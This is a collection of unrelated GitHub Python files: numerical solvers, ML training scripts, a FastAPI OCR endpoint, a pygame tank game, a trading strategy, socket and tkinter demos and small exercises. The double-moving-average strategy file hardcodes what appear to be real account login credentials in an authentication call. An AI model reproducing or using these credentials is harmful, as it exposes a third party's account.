fenics.norm(const_vec)\n\n prec = fenics.PETScPreconditioner('hypre_amg')\n fenics.PETScOptions.set('pc_hypre_boomeramg_relax_type_coarse', 'jacobi')\n me._solver = fenics.PETScKrylovSolver('cg', prec)\n me._solver.set_operator(A)\n\n def solve(me, rhs_fenics_vector, atol=0.0, rtol=1e-7, maxiter=100, verbose=False):\n me._solver.parameters['absolute_tolerance'] = atol\n me._solver.parameters['relative_tolerance'] = rtol\n me._solver.parameters['maximum_iterations'] = maxiter\n me._solver.parameters['monitor_convergence'] = verbose\n\n b = rhs_fenics_vector.copy()\n b = b - b.inner(me.const_vec) * me.const_vec\n\n x = fenics.Function(me.V)\n me._solver.solve(x.vector(), b)\n return x\n\n def solve_point_source(me, point, point_type='ind', atol=0.0, rtol=1e-10, maxiter=100, verbose=False):\n me.b.zero()\n if point_type == 'coords':\n point_fenics = fenics.Point(point)\n elif point_type == 'ind':\n point_fenics = fenics.Point(me.dof_coords[point, :])\n elif point_type == 'fenics':\n point_fenics = point\n else:\n raise RuntimeError('invalid point_type')\n ps = fenics.PointSource(me.V, point_fenics, 1.0)\n ps.apply(me.b)\n\n return me.solve(me.b, atol=atol, rtol=rtol, maxiter=maxiter, verbose=verbose)\n","repo_name":"NickAlger/nalger_helper_functions","sub_path":"nalger_helper_functions/neumann_poisson_solver.py","file_name":"neumann_poisson_solver.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"13645804494","text":"# p76\ndef get_string_length() -> int:\n len = 0\n\n data = list(input('文字列を入力してください\\n>'))\n\n for data[len] in data:\n len +=1\n\n return len\n\nresult = get_string_length()\nprint('文字長 = %d' % result )\n\n# def other_method():\n# data = input('文字列を入力してください\\n>')\n# print('文字長 = %s' % len(data) )\n\n# other_method()","repo_name":"yuga-oinuma/algorithm","sub_path":"Python/get_string_length.py","file_name":"get_string_length.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30244425238","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n\n A script to extract simulated magnetic susceptibility data \n from a SINGLE_ANISO/POLY_ANISO output file.\n\n\n written 2019 by Michael Böhme\n https://github.com/micb25/chemtools\n\n\"\"\"\n\n\nimport sys, re\n\nif ( (len(sys.argv) < 2) or (len(sys.argv) > 2) ):\n sys.exit(\"Usage: %s poly_aniso.output\" % ( sys.argv[0] ))\n\nfound_data = found_sep = False\n\ntry:\n susc = open(sys.argv[1], 'r')\n lines = susc.read().split(\"\\n\")\n susc.close()\nexcept:\n sys.exit(\"Can't read SINGLE_ANISO/POLY_ANISO output file '%s'!\" % ( sys.argv[1] ) )\n \ntry:\n for line in lines:\n if ( re.findall(r'^Units', line) ) and ( found_data == False ) and ( found_sep == False):\n found_data = True\n elif ( found_data == True ):\n if re.findall(r'^----', line):\n if ( found_sep == False ):\n found_sep = True\n else:\n break\n elif ( found_sep == True ) and ( line[0] == ' ' ):\n chit_data = re.findall(r'([0-9]*\\.[0-9]*)', line)\n print(\"%12.6f %18.12f %18.12f\" % ( float(chit_data[0]), float(chit_data[2]), float(chit_data[3]) ) )\n else:\n break\nexcept:\n sys.exit(\"SINGLE_ANISO/POLY_ANISO output file '%s' seems to be corrupt!\" % ( sys.argv[1] ) )\n 
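The b - (b . c) c step in solve() projects the right-hand side off the constant nullspace so the pure-Neumann system stays compatible; the same projection in plain numpy (illustrative, no fenics required):

import numpy as np

def project_out_constant(b: np.ndarray) -> np.ndarray:
    c = np.ones_like(b) / np.sqrt(b.size)   # unit vector spanning the nullspace
    return b - (b @ c) * c

b = np.array([3.0, 1.0, 2.0])
assert abs(project_out_constant(b).sum()) < 1e-12   # zero-mean afterwards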
\n","repo_name":"micb25/chemtools","sub_path":"extract_susc.py","file_name":"extract_susc.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"29535131468","text":"\"\"\"Audio Trainer v1.0\"\"\"\n# import of own scripts\nimport os\n\n# import of own scripts\nimport functions as f\nimport config as conf\n\n#manages all models that have been computed\ndef main():\n userWantNotToQuit = True\n models = f.loadModels()\n while userWantNotToQuit:\n print(\"Currently stored models:\")\n for i in range(len(models)):\n print(\"Nr. \" +\n str(i +\n 1) +\n \": \" +\n str(models[i].name) +\n \" | Frames:\\t\" +\n str(len(models[i].features)) +\n \" | Matches:\\t\" +\n str(models[i].matches) +\n \" | Influenced by:\\t\" +\n str(models[i].influencedBy) +\n \" | Threshold:\\t\" +\n str(models[i].threshold) +\n \" | Score:\\t\" +\n str(models[i].score) +\n \" | Loaded:\\t\" +\n str(models[i].loaded))\n print()\n printCommands()\n isUserInputWrong = True\n while isUserInputWrong:\n userInput = raw_input(\"What do you want to do? \")\n if userInput == \"a\":\n userInput = raw_input(\"Which model do you want to activate? \")\n try:\n selectedModel = int(userInput) - 1\n if selectedModel < len(models):\n if selectedModel >= 0:\n models[selectedModel].activate()\n f.storeSameModel(models[selectedModel])\n isUserInputWrong = False\n else:\n print(\"There are no models with a number smaller or equal 0.\")\n else:\n print(\"There is no model with such a high number.\")\n except ValueError:\n print(\"That was not a number\")\n elif userInput == \"d\":\n userInput = raw_input(\"Which model do you want to deactivate? \")\n try:\n selectedModel = int(userInput) - 1\n if selectedModel < len(models):\n if selectedModel >= 0:\n models[selectedModel].deactivate()\n f.storeSameModel(models[selectedModel])\n isUserInputWrong = False\n else:\n print(\"There are no models with a number smaller or equal 0.\")\n else:\n print(\"There is no model with such a high number.\")\n except ValueError:\n print(\"That was not a number\")\n elif userInput == \"del\":\n userInput = raw_input(\"Which model do you want to delete? \")\n try:\n selectedModel = int(userInput) - 1\n if selectedModel < len(models):\n if selectedModel >= 0:\n os.remove(conf.MODELS_DIR + \"/\" + models[selectedModel].name)\n models = f.loadModels()\n isUserInputWrong = False\n else:\n print(\"There are no models with a number smaller or equal 0.\")\n else:\n print(\"There is no model with such a high number.\")\n except ValueError:\n print(\"That was not a number\")\n elif userInput == \"r\":\n userInput = raw_input(\"Which model do you want to rename? \")\n try:\n selectedModel = int(userInput) - 1\n if selectedModel < len(models):\n if selectedModel >= 0:\n oldModelName = models[selectedModel].name\n newName = raw_input(\"Which name should this model have?\")\n models[selectedModel].name = newName\n f.storeModel(models[selectedModel])\n os.remove(conf.MODELS_DIR + \"/\" + oldModelName)\n isUserInputWrong = False\n else:\n print(\"There are no models with a number smaller or equal 0.\")\n else:\n print(\"There is no model with such a high number.\")\n except ValueError:\n print(\"That was not a number\")\n elif userInput == \"c\":\n userInput = raw_input(\"For which model do you want to change the path to the script? 
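The float-extraction regex above can be exercised on a made-up row shaped like the susceptibility table it parses; fields 0, 2 and 3 are the ones the script prints (their physical meaning is assumed from the header comment):

import re

# a made-up table row in the same shape as the POLY_ANISO block
line = "   2.000000   0.111111   0.123456789012   1.234567890123"
chit_data = re.findall(r'([0-9]*\.[0-9]*)', line)
print("%12.6f %18.12f %18.12f" % (
    float(chit_data[0]), float(chit_data[2]), float(chit_data[3])))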
\")\n try:\n selectedModel = int(userInput) - 1\n if selectedModel < len(models):\n if selectedModel >= 0:\n oldScriptPath = models[selectedModel].script\n newPath = raw_input(\"Where is the script? (Current script is at \" + oldScriptPath + \". \")\n while os.path.isfile(newPath) == False:\n print(\"It seems that there is no script at \" + newPath)\n newPath = raw_input(\"Where is the script? (Current script is at \" + oldScriptPath + \". \")\n models[selectedModel].script = newPath\n f.storeSameModel(models[selectedModel])\n isUserInputWrong = False\n else:\n print(\"There are no models with a number smaller or equal 0.\")\n else:\n print(\"There is no model with such a high number.\")\n except ValueError:\n print(\"That was not a number\")\n elif userInput == \"h\":\n isUserInputWrong = False\n printCommands()\n elif userInput == \"q\":\n isUserInputWrong = False\n userWantNotToQuit = False\n else:\n print(\"That was not a valid input.\")\n\n#prints all possible commands\ndef printCommands():\n print(\"There are the following commands:\")\n print(\"\\ta\\t(a)ctivate a model\")\n print(\"\\td\\t(d)eactivate a model\")\n print(\"\\tdel\\t(del)ete a model\")\n print(\"\\tr\\t(r)ename a model\")\n print(\"\\th\\tprint this (h)elp again\")\n print(\"\\tc\\t(c)hange the path to the script that should be executed\")\n print(\"\\tq\\t(q)uit the model management\")\n","repo_name":"adiran/Bachelor","sub_path":"manageModels.py","file_name":"manageModels.py","file_ext":"py","file_size_in_byte":6483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23042345670","text":"import pandas as pd\r\nimport pickle\r\nimport os.path\r\nimport config\r\nfrom tqdm import tqdm\r\n\r\nfrom pathlib import Path\r\nfrom sklearn.base import TransformerMixin\r\nfrom sklearn.base import BaseEstimator\r\n\r\nfrom imageai.Detection import ObjectDetection\r\n\r\n\r\n\r\nclass ImageTagsTransformer (BaseEstimator, TransformerMixin):\r\n \"\"\"\r\n Obtain sentences tokenized\r\n\r\n \"\"\"\r\n\r\n def __init__ (self, cache_file = '', image_path = 'images', field = ''):\r\n \"\"\"\r\n @param model String (see Config)\r\n @param cache_file String\r\n @param image_path String\r\n @param field String\r\n \"\"\"\r\n super().__init__()\r\n \r\n self.suggested_field = 'twitter_id'\r\n self.model = config.computer_vision['yolo']\r\n self.cache_file = cache_file\r\n self.field = field or self.suggested_field\r\n self.image_path = image_path\r\n self.columns = None\r\n self.temp_folder = ''\r\n \r\n \r\n # Return self nothing else to do here\r\n def fit (self, X, y = None):\r\n return self \r\n \r\n def transform (self, X, **transform_params):\r\n \r\n # Return tokens from cache\r\n if self.cache_file and os.path.exists (self.cache_file):\r\n \r\n # @var features_df DataFrame\r\n features_df = pd.read_csv (self.cache_file, header = 0, sep = ',')\r\n return features_df\r\n\r\n # Settings\r\n detector = ObjectDetection ()\r\n detector.setModelTypeAsYOLOv3 ()\r\n detector.setModelPath (self.model)\r\n detector.loadModel ()\r\n \r\n \r\n # @var probabilities List\r\n probabilities = []\r\n \r\n \r\n # @var labels Set\r\n labels = set ()\r\n \r\n \r\n # @var minimum_percentage_probability int\r\n minimum_percentage_probability = 51\r\n \r\n \r\n # Detect\r\n for index, row in tqdm (X.iterrows (), total = len (X.index)):\r\n \r\n # @var image_path String\r\n image_path = os.path.join (self.image_path, row[self.field])\r\n \r\n \r\n # @var detections\r\n _, detections = 
detector.detectObjectsFromImage (\r\n input_image = image_path,\r\n output_type = 'array',\r\n minimum_percentage_probability = minimum_percentage_probability\r\n )\r\n \r\n \r\n # Attach probabilities\r\n probabilities.append ([(d['name'], d['percentage_probability']) for d in detections])\r\n \r\n \r\n # Attach labels\r\n for d in detections:\r\n labels.add (d['name'])\r\n \r\n \r\n # @var w int width\r\n # @var h int height\r\n w, h = len (labels), len (X.index)\r\n \r\n \r\n # @var labels list\r\n labels = list (labels)\r\n \r\n \r\n # @var matrix List\r\n matrix = [[0 for x in range(w)] for y in range(h)] \r\n \r\n \r\n # Fill the gaps\r\n for row_index, probability in enumerate (probabilities):\r\n for entity in probability:\r\n column_index = labels.index (entity[0])\r\n matrix[row_index][column_index] = entity[1]\r\n \r\n \r\n # @var df_features DataFrame\r\n features = pd.DataFrame (matrix, columns = labels)\r\n \r\n \r\n # Store\r\n if self.cache_file:\r\n features.to_csv (self.cache_file, index = False)\r\n ","repo_name":"Smolky/umuteam-emothreat-2022","sub_path":"code/features/ImageTagsTransformer.py","file_name":"ImageTagsTransformer.py","file_ext":"py","file_size_in_byte":3492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1432101549","text":"import glob\nimport os\n\nimport cv2\nfrom keras.callbacks import CSVLogger\n\nfrom SegNet import LoadData\nfrom SegNet.VggSegNet import VGGSegnet, np\nfrom class_mappings import cmap\nfrom config import *\n\n\ndef train(save_weights_path, train_images_path, train_segs_path, val_images_path, val_segs_path):\n unwanted_width = IMAGE_WIDTH\n unwanted_height = IMAGE_HEIGHT\n\n newest_model = save_weights_path + '.newest'\n\n train_batch_size = BATCH_SIZE\n val_batch_size = BATCH_SIZE\n n_classes = NO_CLASSES\n\n output_height = IMAGE_HEIGHT\n output_width = IMAGE_WIDTH\n\n m = VGGSegnet(n_classes, unwanted_height, unwanted_width)\n\n if os.path.isfile(newest_model):\n m.load_weights(newest_model)\n\n m.compile(loss='categorical_crossentropy',\n optimizer='adadelta',\n metrics=['accuracy'])\n\n G = LoadData.imageSegmentationGenerator(train_images_path, train_segs_path, train_batch_size, n_classes,\n unwanted_height, unwanted_width, output_height, output_width)\n\n G2 = LoadData.imageSegmentationGenerator(val_images_path, val_segs_path, val_batch_size, n_classes, unwanted_height,\n unwanted_width, output_height, output_width)\n csv_logger = CSVLogger('log.csv', append=True, separator=';')\n ep = 1\n while True:\n m.fit_generator(G, 25, validation_data=G2, validation_steps=5, epochs=1, callbacks=[csv_logger], verbose=2)\n # list all data in history\n\n m.save_weights(save_weights_path + \".\" + str(ep))\n m.save_weights(save_weights_path + \".newest\")\n ep += 1\n\n\ndef predict(m, epoch):\n images_path = TO_PREDICT_DIR\n images_out_path = PREDICTED_OUTPUT_DIR\n images = glob.glob(images_path + \"*.jpg\") + glob.glob(images_path + \"*.png\") + glob.glob(images_path + \"*.jpeg\")\n images.sort()\n\n colors = cmap\n\n for imgName in images:\n out_name = imgName.replace(images_path, images_out_path)\n path, name = out_name.rsplit('\\\\', 1)\n out_name = path + '\\\\' + str(epoch) + '__' + name\n x = LoadData.getImageArr(imgName, IMAGE_WIDTH, IMAGE_HEIGHT)\n pr = m.predict(np.array([x]))[0]\n pr = pr.reshape((IMAGE_HEIGHT, IMAGE_WIDTH, NO_CLASSES)).argmax(axis=2)\n seg_img = np.zeros((IMAGE_HEIGHT, IMAGE_WIDTH, 3))\n for c in range(NO_CLASSES):\n seg_img[:, :, 0] += ((pr[:, :] == c) * 
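Stripped of the detector, the loop above is a label/confidence matrix fill in the style of a document-term matrix; the same logic isolated on hypothetical detections:

import pandas as pd

probabilities = [[("person", 92.1), ("dog", 67.4)], [("person", 88.0)]]
labels = sorted({name for row in probabilities for name, _ in row})

matrix = [[0] * len(labels) for _ in probabilities]
for r, row in enumerate(probabilities):
    for name, prob in row:
        matrix[r][labels.index(name)] = prob    # one column per detected class

features = pd.DataFrame(matrix, columns=labels)
#     dog  person
# 0  67.4    92.1
# 1   0.0    88.0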
(colors[c][0])).astype('uint8')\n seg_img[:, :, 1] += ((pr[:, :] == c) * (colors[c][1])).astype('uint8')\n seg_img[:, :, 2] += ((pr[:, :] == c) * (colors[c][2])).astype('uint8')\n seg_img = cv2.resize(seg_img, (IMAGE_WIDTH, IMAGE_HEIGHT))\n cv2.imwrite(out_name, seg_img)\n","repo_name":"admal/DeepLearningSegmentation","sub_path":"SegNet/PrepareModel.py","file_name":"PrepareModel.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7582789169","text":"from fastapi import FastAPI, UploadFile, File, Request\nimport base64\nfrom datetime import datetime\nimport cv2\nimport numpy as np\nimport requests\nfrom paddleocr import PaddleOCR\n\nocr = PaddleOCR(use_angle_cls=True, lang='en')\n\ndef image_to_cv2(image_data):\n nparr = np.frombuffer(image_data, np.uint8)\n img_cv2 = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n return img_cv2\n\ndef string_to_date(date_string):\n date_object = datetime.strptime(date_string, '%d-%m-%Y').date()\n return date_object\n\ndef call_post_api(data, api_url):\n headers = {'Content-Type': 'application/json'}\n response = requests.post(api_url, json=data, headers=headers)\n print(response)\n print(data)\n if response.status_code == 200:\n print(\"Gửi dữ liệu thành công!\")\n else:\n print(\"Gửi dữ liệu không thành công. Mã lỗi:\", response.status_code)\n\napp = FastAPI()\n\n@app.post(\"/upload_invoice/\")\nasync def upload_invoice(file: UploadFile = File(...), request: Request = None):\n contents = await file.read()\n image_cv2 = image_to_cv2(contents)\n result = ocr.ocr(image_cv2, cls=True)\n current_datetime = datetime.now()\n id_user = request.query_params.get(\"meter_serial_number\", None)\n total_price = int(result[0][2][1][0])\n total_price = int(total_price / 10) + total_price % 10 / 10\n print(total_price)\n print(id_user)\n encoded_image = base64.b64encode(contents).decode('utf-8')\n api_url = 'https://btliot-production.up.railway.app/api/v1/consumption'\n data = {\n \"meter_serial_number\": id_user,\n \"current_reading\": total_price,\n \"electricity_rate\": 4000,\n \"electricity_month\": int(current_datetime.timestamp()),\n }\n call_post_api(data, api_url)\n \n return {\"total_price\": total_price, \"image\": encoded_image}\n","repo_name":"Nguyenquanghanhd20ptit/btl_IOT","sub_path":"electricity-ai/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17334359398","text":"import pygame\r\nfrom tank import Tank\r\nimport arena\r\nimport collision\r\n# from bulletclass import Bullet\r\n\r\n\r\nclass Game(object):\r\n def __init__(self, width=800, height=600):\r\n self.width = width\r\n self.height = height\r\n self.screen = pygame.display.set_mode((self.width, self.height))\r\n pygame.display.set_caption(\"Combat\")\r\n\r\n self.clock = pygame.time.Clock()\r\n\r\n self.game_over = False\r\n\r\n self.player_1 = Tank(70, 340, '1')\r\n self.bullets_1 = self.player_1.get_player_bullets()\r\n self.player_2 = Tank(730, 340, '2')\r\n self.bullets_2 = self.player_2.get_player_bullets()\r\n\r\n self.wall_list = arena.create_arena()\r\n\r\n self.game_loop = True\r\n\r\n def run(self):\r\n\r\n while self.game_loop:\r\n self.clock.tick(60)\r\n if not self.game_over:\r\n for b in self.bullets_1:\r\n b.move()\r\n for b in self.bullets_2:\r\n b.move()\r\n\r\n keys = pygame.key.get_pressed()\r\n if keys[pygame.K_a]:\r\n self.player_1.turn_left()\r\n if 
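The per-class coloring loop in predict() can also be written as a single palette lookup; a vectorized sketch (assuming the cmap palette is an n_classes x 3 uint8 array):

import numpy as np

def colorize(pr: np.ndarray, palette: np.ndarray) -> np.ndarray:
    # pr: (H, W) argmax class map; palette: (n_classes, 3) RGB rows
    return palette[pr]               # fancy indexing does the per-pixel lookup

palette = np.array([[0, 0, 0], [255, 0, 0]], dtype=np.uint8)
mask = np.array([[0, 1], [1, 0]])
assert colorize(mask, palette).shape == (2, 2, 3)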
keys[pygame.K_d]:\r\n self.player_1.turn_right()\r\n if keys[pygame.K_w]:\r\n self.player_1.move()\r\n\r\n if keys[pygame.K_LEFT]:\r\n self.player_2.turn_left()\r\n if keys[pygame.K_RIGHT]:\r\n self.player_2.turn_right()\r\n if keys[pygame.K_UP]:\r\n self.player_2.move()\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n self.game_loop = False\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_s:\r\n if not self.game_over:\r\n self.player_1.shoot()\r\n if event.key == pygame.K_DOWN:\r\n if not self.game_over:\r\n self.player_2.shoot()\r\n\r\n collision.tank_collision(self.player_1, self.player_2)\r\n collision.tank_collision(self.player_2, self.player_1)\r\n for wall in self.wall_list:\r\n collision.wall_collision(self.player_1, wall)\r\n collision.wall_collision(self.player_2, wall)\r\n\r\n # update self.screen\r\n self.screen.fill(((151, 163, 67, 255)))\r\n self.player_1.draw(self.screen)\r\n self.player_2.draw(self.screen)\r\n for b in self.bullets_1:\r\n b.draw(self.screen)\r\n for b in self.bullets_2:\r\n b.draw(self.screen)\r\n for wall in self.wall_list:\r\n pygame.draw.rect(self.screen, (253, 181, 104, 255), wall)\r\n pygame.display.update()\r\n\r\n\r\ngame = Game(800, 600)\r\ngame.run()\r\n","repo_name":"rayanemferreira/lpc","sub_path":"PyGameTankPongOO/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2873,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"9184770247","text":"\r\n\r\ndef idle(S: str):\r\n sw=0 #счетчик свободных мест (с учетом ограничений COVID-19)\r\n k=0 #счетчик пустых мест\r\n j=0 #счетчик занимаемых мест (чтоб отступать от занятого места)\r\n i=0 #счетчик итераций\r\n while i<(len(S)-1):\r\n if (S[i] == '0') and (S[i+1]== '0'):\r\n k+=1\r\n if j==0:\r\n sw+=1\r\n j+=1\r\n else:\r\n j-=1\r\n elif S[i]=='1':\r\n k = -1\r\n \r\n i+=1\r\n\r\n return sw\r\n \r\n \r\nP = str(input('Введите строку типа: 0100110001 где: \\n0 - пустое место пляжа \\n1 - занятое место пляжа\\n'))\r\n\r\nprint(idle(P))\r\n","repo_name":"MrinskiyAndrey/Homework","sub_path":"13.py","file_name":"13.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37039755286","text":"import datetime\n\nfrom simplequant.strategy.basestrategy import BaseStrategy\nfrom simplequant.backtest.event import SignalEvent\nfrom simplequant.constant import Direction, OrderTime\n\n\nclass DoubleMovingAverageStrategy(BaseStrategy):\n \"\"\"\n 演示策略3:双均线策略。当短均线上穿长均线时买入股票,当短均线下穿长均线时卖出所有股票。\n \"\"\"\n\n def __init__(self, portfolio):\n self.symbol = '000651.XSHE' # 格力电器\n self.short = 5\n self.long = 30\n self.field = 'close'\n self.quantity = 1000\n self.api.auth('13802947200', '947200')\n\n def handleBar(self, events_queue, event):\n date = datetime.datetime.strptime(str(event.datetime), '%Y%m%d')\n bars = self.api.get_price(self.symbol, end_date=date, count=self.long+1, frequency='daily')\n short_average = bars[self.field].rolling(self.short).mean()\n long_average = bars[self.field].rolling(self.long).mean()\n\n if short_average.iloc[-1] > long_average.iloc[-1] and short_average.iloc[-2] <= long_average.iloc[-2]:\n signal_event = SignalEvent(event.datetime, self.symbol, Direction.LONG, self.quantity, OrderTime.OPEN)\n events_queue.put((signal_event.priority, signal_event))\n elif short_average.iloc[-1] < long_average.iloc[-1] and short_average.iloc[-2] >= long_average.iloc[-2]:\n signal_event = 
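The loop above mixes pygame's two input styles deliberately: key-state polling for held movement keys, and KEYDOWN events for one-shot actions like shooting. The bare pattern, factored out for clarity (player is any object with move/shoot, as in the Tank class):

import pygame

def handle_input(player):
    keys = pygame.key.get_pressed()            # state: true every frame while held
    if keys[pygame.K_w]:
        player.move()
    for event in pygame.event.get():           # edge: one event per key press
        if event.type == pygame.QUIT:
            return False
        if event.type == pygame.KEYDOWN and event.key == pygame.K_s:
            player.shoot()
    return True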
SignalEvent(event.datetime, self.symbol, Direction.NET, self.quantity, OrderTime.OPEN)\n events_queue.put((signal_event.priority, signal_event))\n\n","repo_name":"benjaminkz/simplequant","sub_path":"simplequant/strategy/double_moving_average_strategy.py","file_name":"double_moving_average_strategy.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6402559808","text":"#!/usr/bin/env python3\n\nimport pandas as pd\nimport os\n\ndef snow_depth():\n f = os.path.dirname(os.path.realpath(__file__)) + \"/kumpula-weather-2017.csv\"\n df = pd.read_csv(f)\n return df[\"Snow depth (cm)\"].max()\n\ndef main():\n depth = snow_depth()\n print(f\"Max snow depth: {depth:2.1f}\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"DU-ds/PythonDataAnalysisCourse","sub_path":"hy-data-analysis-with-python-summer-2019/part04-e09_snow_depth/src/snow_depth.py","file_name":"snow_depth.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73519721847","text":"import subprocess\nimport os\n\nWINDOW_SIZE = 1\nRUNNER = 'DataflowRunner'\nPROJECT_ID = 'big-d-project-404815'\nREGION = 'europe-central2'\nBUCKET_NAME = 'big-d-project-master-dataset'\n\ncommand = [\n 'python', \n './bitcoin_dataflow.py',\n f'--project={PROJECT_ID}',\n f'--region={REGION}',\n f'--window_size={WINDOW_SIZE}',\n f'--runner={RUNNER}',\n f'--temp_location=gs://{BUCKET_NAME}/temp'\n]\n\ntry:\n subprocess.run(command, check=True)\nexcept subprocess.CalledProcessError as e:\n print(f\"Error: {e}\")","repo_name":"warsaw-ml/big-d","sub_path":"dataflow/run_dataflow.py","file_name":"run_dataflow.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29432263179","text":"# por favor escribe aquí tu función\ndef es_primo(num, n=2):\n if num == 1: \n return False\n if num > 1:\n cont = 0\n for i in range(n,num):\n resta = num%i\n if resta == 0:\n cont += 1\n if cont == 0:\n return True\n else:\n return False","repo_name":"pabloschwarzenberg/grader","sub_path":"tema2_p1/tema2_p1_64ee2d10b8ea2f2a60c506ddc7a38f2a.py","file_name":"tema2_p1_64ee2d10b8ea2f2a60c506ddc7a38f2a.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17939961788","text":"import http\nimport unittest\nimport uuid\n\nfrom api.tests.common import client\n\n\nclass TestBuilding(unittest.TestCase):\n def test_create_building(self):\n create_user_body = {\n 'name': 'Dummy Name',\n 'document': str(uuid.uuid4()),\n 'address': 'Dummy Address',\n 'email': 'a@a.com',\n 'cellphone': '0800',\n }\n response = client.post(\n '/users/',\n json=create_user_body,\n )\n\n self.assertEqual(response.status_code, http.HTTPStatus.CREATED)\n data = response.json()\n user_id = data['id']\n\n create_building_body = {\n 'name': 'Dummy Building',\n 'address': 'Dummy Address',\n 'description': 'Dummy Description',\n }\n\n response = client.post(f'/users/{user_id}/buildings', json=create_building_body)\n\n self.assertEqual(response.status_code, http.HTTPStatus.CREATED)\n self.assertIsNotNone(response.text)\n data = response.json()\n self.assertEqual(data['name'], 'Dummy Building')\n self.assertIn('id', data)\n self.assertEqual(data['owner_id'], user_id)\n self.assertEqual(data['address'], 'Dummy Address')\n 
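The golden/death-cross tests in handleBar() only need the last two points of each rolling mean; the same condition on a bare Series (synthetic closes, window sizes shrunk for the example):

import pandas as pd

close = pd.Series([10, 10, 10, 10, 9, 12, 14, 15, 13, 12])
short = close.rolling(3).mean()
long_ = close.rolling(5).mean()

golden_cross = short.iloc[-1] > long_.iloc[-1] and short.iloc[-2] <= long_.iloc[-2]
death_cross = short.iloc[-1] < long_.iloc[-1] and short.iloc[-2] >= long_.iloc[-2]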
self.assertEqual(data['description'], 'Dummy Description')\n","repo_name":"gilMars/renting-building-api","sub_path":"api/tests/test_buildings.py","file_name":"test_buildings.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15945267605","text":"from tkinter import *\nfrom PIL import ImageTk, Image\n\nroot = Tk()\nroot.title(\"Radio Buttons\")\n\n#r = IntVar()\n\nMODES = [\n (\"Pepperoni\", \"Pepperoni\"), # display - value\n (\"Cheese\", \"Cheese\"),\n (\"Mushroom\", \"Mushroom\"),\n (\"Onion\", \"Onion\"),\n]\n\npizza = StringVar()\n#pizza.set(\"Pepperoni\")\n\nfor text, mode in MODES:\n Radiobutton(root, text=text, variable=pizza, value=mode).pack()\n\n\n\ndef clicked(option):\n myLabel = Label(root, text=option)\n myLabel.pack()\n\n#Radiobutton(root, text=\"Option 1\", variable=r, value=1, command=lambda: clicked(r.get())).pack()\n#Radiobutton(root, text=\"Option 2\", variable=r, value=2, command=lambda: clicked(r.get())).pack()\n\nmyButton = Button(root, text=\"Click Me\", command=lambda: clicked(pizza.get()))\nmyButton.pack()\n\nroot.mainloop()","repo_name":"smamirov/tkinterTutorial","sub_path":"radio.py","file_name":"radio.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19650869039","text":"from socket import *\nfrom time import ctime\n# 时间戳服务器\nhost = ''\nbufferSize = 1024\nport = 9876\naddr = (host,port)\ntcpServerSocket = socket(AF_INET, SOCK_STREAM)\ntcpServerSocket.bind(addr)\ntcpServerSocket.listen(5)\nwhile True:\n print('正在等待客户端连接')\n tcpClientSocket,addr = tcpServerSocket.accept()\n print('客户端已经连接','addr','=',addr)\n while True:\n data = tcpClientSocket.recv(bufferSize)\n if not data:\n break;\n tcpClientSocket.send(ctime().encode(encoding='utf-8') + b' ' + data)\n tcpClientSocket.close()\ntcpServerSocket.close();\n ","repo_name":"moqifeiliuming/code","sub_path":"CODE/chapter15/demo15.04.py","file_name":"demo15.04.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"11423775677","text":"import functions\nimport re\nmaterialsDict={}\ncookiesDict={}\n\nnumberOfMaterials=input(\"number of materials: \\n\")\nfor x in range(int(numberOfMaterials)):\n inputed = input(\"material: \\n\")\n words=inputed.split()\n if words[0]==\"add\":\n functions.adding_materials(materialsDict,words[1],words[2])\nprint(materialsDict)\n\nnumberOfCookies=input(\"number of cookies: \\n\")\nfor x in range(int(numberOfCookies)):\n inputed = input(\"cookie: \\n\")\n new_inputed=re.sub(\":\",\" \",inputed)\n new_inputed=re.sub(\",\",\" \",new_inputed)\n words=new_inputed.split()\n # print(words)\n # print(new_inputed, len(words))\n number_of_elements_per_cookie = int((len(words)-4)/2)\n if (words[0]==\"define\" and words[1]==\"suit\"):\n 